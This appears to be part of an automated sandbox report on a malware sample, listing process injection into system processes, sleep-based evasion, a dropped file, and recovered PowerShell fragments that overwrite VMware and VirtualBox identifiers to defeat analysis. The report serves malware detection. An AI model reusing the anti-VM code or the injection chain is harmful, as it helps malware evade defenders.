Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Windows\System32\dialer.exe Code function: OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,CloseHandle,CloseHandle, 4_2_00007FF78AB310C0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4262
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5599
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5847
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3921
Source: C:\Windows\System32\winlogon.exe Window / User API: threadDelayed 8389
Source: C:\Windows\System32\winlogon.exe Window / User API: threadDelayed 1610
Source: C:\Windows\System32\lsass.exe Window / User API: threadDelayed 9926
Source: C:\Windows\System32\dwm.exe Window / User API: threadDelayed 9872
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6812
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2937
Source: C:\Windows\System32\dialer.exe Window / User API: threadDelayed 1287
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6965
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2662
Source: C:\Users\user\Desktop\ylVAEHbMLf.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\yfiogronfirx.tmp
Source: C:\Windows\System32\dwm.exe Evasive API call chain: RegOpenKey,DecisionNodes,Sleep
Source: C:\Windows\System32\svchost.exe Evasive API call chain: RegOpenKey,DecisionNodes,Sleep
Source: C:\Windows\System32\winlogon.exe Evasive API call chain: RegOpenKey,DecisionNodes,Sleep
Source: C:\Windows\System32\dialer.exe Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Windows\System32\winlogon.exe API coverage: 7.8 %
Source: C:\Windows\System32\lsass.exe API coverage: 8.5 %
Source: C:\Windows\System32\svchost.exe API coverage: 6.2 %
Source: C:\Windows\System32\svchost.exe API coverage: 6.0 %
Source: C:\Windows\System32\svchost.exe API coverage: 3.4 %
Source: C:\Windows\System32\svchost.exe API coverage: 6.2 %
Source: C:\Windows\System32\svchost.exe API coverage: 7.0 %
Source: C:\Windows\System32\svchost.exe API coverage: 7.7 %
Source: C:\Windows\System32\svchost.exe API coverage: 6.0 %
Source: C:\Windows\System32\svchost.exe API coverage: 7.5 %
Source: C:\Windows\System32\svchost.exe API coverage: 5.7 %
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe API coverage: 1.4 %
Source: C:\Windows\System32\svchost.exe API coverage: 6.2 %
Source: C:\Windows\System32\svchost.exe API coverage: 3.5 %
Source: C:\Windows\System32\svchost.exe API coverage: 6.2 %
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6200 Thread sleep count: 4262 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6200 Thread sleep count: 5599 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2484 Thread sleep time: -7378697629483816s >= -30000s
Source: C:\Windows\System32\dialer.exe TID: 2180 Thread sleep count: 91 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2656 Thread sleep count: 5847 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2568 Thread sleep count: 3921 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6304 Thread sleep time: -8301034833169293s >= -30000s
Source: C:\Windows\System32\winlogon.exe TID: 6428 Thread sleep count: 8389 > 30
Source: C:\Windows\System32\winlogon.exe TID: 6428 Thread sleep time: -8389000s >= -30000s
Source: C:\Windows\System32\winlogon.exe TID: 6428 Thread sleep count: 1610 > 30
Source: C:\Windows\System32\winlogon.exe TID: 6428 Thread sleep time: -1610000s >= -30000s
Source: C:\Windows\System32\lsass.exe TID: 2504 Thread sleep count: 9926 > 30
Source: C:\Windows\System32\lsass.exe TID: 2504 Thread sleep time: -9926000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 7044 Thread sleep count: 274 > 30
Source: C:\Windows\System32\svchost.exe TID: 7044 Thread sleep time: -274000s >= -30000s
Source: C:\Windows\System32\dwm.exe TID: 6228 Thread sleep count: 9872 > 30
Source: C:\Windows\System32\dwm.exe TID: 6228 Thread sleep time: -9872000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 6380 Thread sleep count: 251 > 30
Source: C:\Windows\System32\svchost.exe TID: 6380 Thread sleep time: -251000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 6324 Thread sleep count: 253 > 30
Source: C:\Windows\System32\svchost.exe TID: 6324 Thread sleep time: -253000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 4208 Thread sleep count: 253 > 30
Source: C:\Windows\System32\svchost.exe TID: 4208 Thread sleep time: -253000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 3512 Thread sleep count: 248 > 30
Source: C:\Windows\System32\svchost.exe TID: 3512 Thread sleep time: -248000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 3704 Thread sleep count: 199 > 30
Source: C:\Windows\System32\svchost.exe TID: 3704 Thread sleep time: -199000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 4180 Thread sleep count: 253 > 30
Source: C:\Windows\System32\svchost.exe TID: 4180 Thread sleep time: -253000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 7096 Thread sleep count: 232 > 30
Source: C:\Windows\System32\svchost.exe TID: 7096 Thread sleep time: -232000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 5724 Thread sleep count: 250 > 30
Source: C:\Windows\System32\svchost.exe TID: 5724 Thread sleep time: -250000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4348 Thread sleep count: 6812 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7072 Thread sleep count: 2937 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7124 Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 7156 Thread sleep count: 249 > 30
Source: C:\Windows\System32\svchost.exe TID: 7156 Thread sleep time: -249000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 2996 Thread sleep count: 249 > 30
Source: C:\Windows\System32\svchost.exe TID: 2996 Thread sleep time: -249000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 5740 Thread sleep count: 242 > 30
Source: C:\Windows\System32\svchost.exe TID: 5740 Thread sleep time: -242000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 6376 Thread sleep count: 232 > 30
Source: C:\Windows\System32\svchost.exe TID: 6376 Thread sleep time: -232000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 3632 Thread sleep count: 249 > 30
Source: C:\Windows\System32\svchost.exe TID: 3632 Thread sleep time: -249000s >= -30000s
Source: C:\Windows\System32\dialer.exe TID: 4284 Thread sleep count: 1287 > 30
Source: C:\Windows\System32\dialer.exe TID: 4284 Thread sleep time: -128700s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 5264 Thread sleep count: 252 > 30
Source: C:\Windows\System32\svchost.exe TID: 5264 Thread sleep time: -252000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 416 Thread sleep count: 6965 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 416 Thread sleep count: 2662 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1456 Thread sleep time: -5534023222112862s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 5180 Thread sleep count: 251 > 30
Source: C:\Windows\System32\svchost.exe TID: 5180 Thread sleep time: -251000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 7124 Thread sleep count: 249 > 30
Source: C:\Windows\System32\svchost.exe TID: 7124 Thread sleep time: -249000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 2568 Thread sleep count: 242 > 30
Source: C:\Windows\System32\svchost.exe TID: 2568 Thread sleep time: -242000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 6740 Thread sleep count: 221 > 30
Source: C:\Windows\System32\svchost.exe TID: 6740 Thread sleep time: -221000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 6404 Thread sleep count: 249 > 30
Source: C:\Windows\System32\svchost.exe TID: 6404 Thread sleep time: -249000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 5744 Thread sleep count: 50 > 30
Source: C:\Windows\System32\svchost.exe TID: 5744 Thread sleep time: -50000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 3716 Thread sleep count: 248 > 30
Source: C:\Windows\System32\svchost.exe TID: 3716 Thread sleep time: -248000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 2656 Thread sleep count: 251 > 30
Source: C:\Windows\System32\svchost.exe TID: 2656 Thread sleep time: -251000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 4192 Thread sleep count: 240 > 30
Source: C:\Windows\System32\svchost.exe TID: 4192 Thread sleep time: -240000s >= -30000s
Source: C:\Windows\System32\spoolsv.exe TID: 3444 Thread sleep count: 251 > 30
Source: C:\Windows\System32\spoolsv.exe TID: 3444 Thread sleep time: -251000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 4856 Thread sleep count: 247 > 30
Source: C:\Windows\System32\svchost.exe TID: 4856 Thread sleep time: -247000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 2192 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 6200 Thread sleep count: 231 > 30
Source: C:\Windows\System32\svchost.exe TID: 6200 Thread sleep time: -231000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 1856 Thread sleep count: 251 > 30
Source: C:\Windows\System32\svchost.exe TID: 1856 Thread sleep time: -251000s >= -30000s
Source: C:\Windows\System32\dialer.exe Last function: Thread delayed
Source: C:\Windows\System32\dialer.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\dwm.exe Last function: Thread delayed
Source: C:\Windows\System32\dwm.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\dialer.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\spoolsv.exe Last function: Thread delayed
Source: C:\Windows\System32\spoolsv.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\winlogon.exe Code function: 7_2_00000225DC64BE3C FindFirstFileExW, 7_2_00000225DC64BE3C
Source: C:\Windows\System32\winlogon.exe Code function: 7_2_00000225DC6ABE3C FindFirstFileExW, 7_2_00000225DC6ABE3C
Source: C:\Windows\System32\lsass.exe Code function: 8_2_00000202C0AEBE3C FindFirstFileExW, 8_2_00000202C0AEBE3C
Source: C:\Windows\System32\svchost.exe Code function: 9_2_000002A66130BE3C FindFirstFileExW, 9_2_000002A66130BE3C
Source: C:\Windows\System32\dwm.exe Code function: 10_2_000002BAAE29BE3C FindFirstFileExW, 10_2_000002BAAE29BE3C
Source: C:\Windows\System32\svchost.exe Code function: 11_2_0000026A879CBE3C FindFirstFileExW, 11_2_0000026A879CBE3C
Source: C:\Windows\System32\svchost.exe Code function: 12_2_00000179537ABE3C FindFirstFileExW, 12_2_00000179537ABE3C
Source: C:\Windows\System32\svchost.exe Code function: 12_2_0000017953D4BE3C FindFirstFileExW, 12_2_0000017953D4BE3C
Source: C:\Windows\System32\svchost.exe Code function: 13_2_000002295D56BE3C FindFirstFileExW, 13_2_000002295D56BE3C
Source: C:\Windows\System32\svchost.exe Code function: 14_2_0000025306E6BE3C FindFirstFileExW, 14_2_0000025306E6BE3C
Source: C:\Windows\System32\svchost.exe Code function: 15_2_000001845B3BBE3C FindFirstFileExW, 15_2_000001845B3BBE3C
Source: C:\Windows\System32\svchost.exe Code function: 16_2_000001ADECD4BE3C FindFirstFileExW, 16_2_000001ADECD4BE3C
Source: C:\Windows\System32\svchost.exe Code function: 17_2_000001D55907BE3C FindFirstFileExW, 17_2_000001D55907BE3C
Source: C:\Windows\System32\svchost.exe Code function: 18_2_00000241A9EABE3C FindFirstFileExW, 18_2_00000241A9EABE3C
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe Code function: 21_2_000002152C3EBE3C FindFirstFileExW, 21_2_000002152C3EBE3C
Source: C:\Windows\System32\svchost.exe Code function: 24_2_000001CD7319BE3C FindFirstFileExW, 24_2_000001CD7319BE3C
Source: C:\Windows\System32\svchost.exe Code function: 26_2_000002824E89BE3C FindFirstFileExW, 26_2_000002824E89BE3C
Source: C:\Windows\System32\svchost.exe Code function: 26_2_000002824E8FBE3C FindFirstFileExW, 26_2_000002824E8FBE3C
Source: C:\Windows\System32\svchost.exe Code function: 27_2_0000021B47B3BE3C FindFirstFileExW, 27_2_0000021B47B3BE3C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: powershell.exe, 00000005.00000002.1784891637.000001FA2FE68000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Remove-NetEventVmNetworkAdapter
Source: lsass.exe, 00000008.00000000.1747558953.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: pvmicvssNT SERVICE
Source: svchost.exe, 00000011.00000000.1818112818.000001D559274000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware SATA CD00
Source: svchost.exe, 0000000F.00000002.3019665263.000001845BC0A000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: zSCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000_0r
Source: svchost.exe, 00000011.00000000.1818112818.000001D559274000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: NECVMWarVMware SATA CD00
Source: svchost.exe, 00000011.00000000.1818112818.000001D559274000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: LSI_SASVMware Virtual disk 6000c2942fce4d06663969f532e45d1a
Source: svchost.exe, 00000031.00000000.1949907163.0000023D1002B000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: svchost.exe, 00000011.00000000.1818929292.000001D559386000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMwareVirtual disk6000c2942fce4d06663969f532e45d1a8
Source: dwm.exe, 0000000A.00000000.1759493693.000002BAAA00C000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000S
Source: svchost.exe, 00000011.00000003.1837092807.000001D5593A4000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMwareVirtual disk2.06000c2942fce4d06663969f532e45d1aPCI Slot 32 : Bus 2 : Device 0 : Function 0 : Adapter 0 : Port 0 : Target 0 : LUN 0PCI\VEN_1000&DEV_0054&SUBSYS_197615AD&REV_01\3&218e0f40&0&00
Source: svchost.exe, 00000011.00000000.1818112818.000001D559274000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: storahciNECVMWarVMware SATA CD00
Source: powershell.exe, 00000005.00000002.1784891637.000001FA2FE68000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Get-NetEventVmNetworkAdapter
Source: svchost.exe, 00000011.00000003.1840991090.000001D559394000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMwareVirtual disk6000c2942fce4d06663969f532e45d1ap
Source: svchost.exe, 00000011.00000003.1844293495.000001D559C7F000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware Virtual disk 2.0 6000c2942fce4d06663969f532e45d1aPCI\VEN_1000&DEV_0054&SUBSYS_197615AD&REV_01\3&218E0F40&0&00NTFS
Source: svchost.exe, 00000011.00000002.2977200435.000001D558DE0000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: $value = $pr.Value.replace("VBOX", $value).replace("VBox", $value).replace("VMWARE", $value).replace("VMware Virtual disk", $value).replace("VMware", $value).replace("HARDDISK", "WDC").replace("VIRTUAL_DISK", $value)
Source: lsass.exe, 00000008.00000000.1747335581.00000202BFC13000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.2981325405.00000202BFC13000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.2960919454.000002A660613000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000009.00000000.1753411970.000002A660613000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000C.00000000.1787229019.000001795302B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.2959653113.000001795302B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000D.00000000.1789041841.000002295CE2A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.2959031284.000002295CE2A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000F.00000000.1799203992.000001845AC3F000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.2971480214.000001845AC3F000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000011.00000000.1816159694.000001D55862B000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: svchost.exe, 00000009.00000000.1753452137.000002A66062A000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
Source: svchost.exe, 00000011.00000002.2984001454.000001D558F62000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMCI: Using capabilities (0x1c).
Source: lsass.exe, 00000008.00000000.1747558953.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: pvmicshutdownNT SERVICE
Source: svchost.exe, 00000011.00000002.2977200435.000001D558DE0000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: $value = $pr.Value.replace("VEN_80EE", $value).replace("VEN_15AD", $value).replace("VBOX", $value).replace("VBox", $value).replace("VMWARE", $value).replace("82801FB", $value).replace("82441FX", $value).replace("82371SB", $value).replace("OpenHCD", $value).replace("VMWare", $value).replace("VMware", $value)
Source: svchost.exe, 00000011.00000000.1818112818.000001D559274000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: nonicNECVMWarVMware SATA CD00
Source: svchost.exe, 00000011.00000000.1816159694.000001D55862B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.2963751898.000001D55862B000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Microsoft-Windows-Hyper-V-Hypervisor
Source: powershell.exe, 00000005.00000002.1784891637.000001FA2FE68000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Add-NetEventVmNetworkAdapter
Source: svchost.exe, 00000011.00000003.1840991090.000001D559394000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMwareVirtual disk6000c2942fce4d06663969f532e45d1a@
Source: svchost.exe, 00000011.00000002.2977200435.000001D558DE0000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: $value = $pr.Value.replace("VBOX", $value).replace("VBox", $value).replace("VMWARE", $value).replace("VMware", $value).replace("VirtualBox", $value).replace("Oracle Corporation", $value).replace("Microsoft Basic Display Adapter", $value)
Source: lsass.exe, 00000008.00000000.1748160147.00000202C037F000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: NXTVMWare
Source: svchost.exe, 00000011.00000000.1818112818.000001D559274000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: nonicVMware Virtual disk 6000c2942fce4d06663969f532e45d1a
Source: svchost.exe, 00000011.00000000.1816191216.000001D558643000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: (@vmcitpA
Source: svchost.exe, 00000009.00000003.1981446312.000002A660660000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: @SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: svchost.exe, 0000000D.00000002.2956193714.000002295CE00000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcUmRdpServiceDsSvcfhsvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionsvsvcStorSvcWwanSvcvmicvssDevQueryBrokerNgcSvcsysmainNetmanTabletInputServicePcaSvcDisplayEnhancementServiceIPxlatCfgSvcDeviceAssociationServiceNcbServiceEmbeddedModeSensorServicewlansvcCscServiceWPDBusEnumMixedRealityOpenXRSvc
Source: lsass.exe, 00000008.00000000.1747558953.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: pvmicheartbeatNT SERVICE
Source: svchost.exe, 00000011.00000000.1818211836.000001D5592C3000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: dowvmci
Source: svchost.exe, 00000011.00000000.1818112818.000001D559274000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware
Source: svchost.exe, 00000011.00000003.1846316422.000001D5599B5000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
Source: svchost.exe, 00000011.00000002.2977200435.000001D558DE0000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: if(($pr.Name -eq "Caption" -or $pr.Name -eq "Name" -or $pr.Name -eq "PNPDeviceID" -or $pr.Name -eq "AdapterCompatibility" -or $pr.Name -eq "Description" -or $pr.Name -eq "InfSection" -or $pr.Name -eq "VideoProcessor") -and ($pr.Value -match 'VBOX' -or $pr.Value -match 'VBox' -or $pr.Value -match 'VMWARE' -or $pr.Value -match 'VirtualBox' -or $pr.Value -match 'VMware' -or $pr.Value -match 'Oracle Corporation' -or $pr.Value -match 'Microsoft Basic Display Adapter'))
